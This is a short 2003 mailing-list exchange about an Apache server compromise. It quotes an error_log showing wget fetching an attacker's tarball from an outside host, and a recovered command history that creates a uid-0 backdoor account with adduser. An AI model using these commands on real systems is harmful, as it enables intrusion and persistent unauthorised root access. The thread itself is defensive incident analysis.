Checked, No Root access gen. No CGI ACCESS - No log in access_log No Shell Access by wwwrun Play back his history, root access cannot be done BTW, what the hell "raver" Stefan Andreas Tichy wrote:
On Thu, Sep 04, 2003 at 12:43:07AM +0800, Marco Lum wrote:
Follows found in error_log of apache
--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
0K ......... 100% 13.69 KB/s
09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
Wget output in apache error_log. Check for a CGI (shell script?) allowing clients to execute arbitrary commands.
Also Found his command history:
id /usr/sbin/adduser vulturul -u0 -g0 -M;
He has root access but is not shure about that?
At least two problems. Execution of commands as user wwwrun and local root compromise.
I hope the box has been disconnectet from the network already.
-- Marco Lum Net Service Manager ___________________________________________________________________________________________ System Development Service Inter/Intra/Local-Area Networking Service VOICE: +852 2851 1190 FAX : +852 2851 1109 Email: enquiry@hkservice.com WWWeb: http://www.hkservice.com HK Service Company HK Service Consultants Limited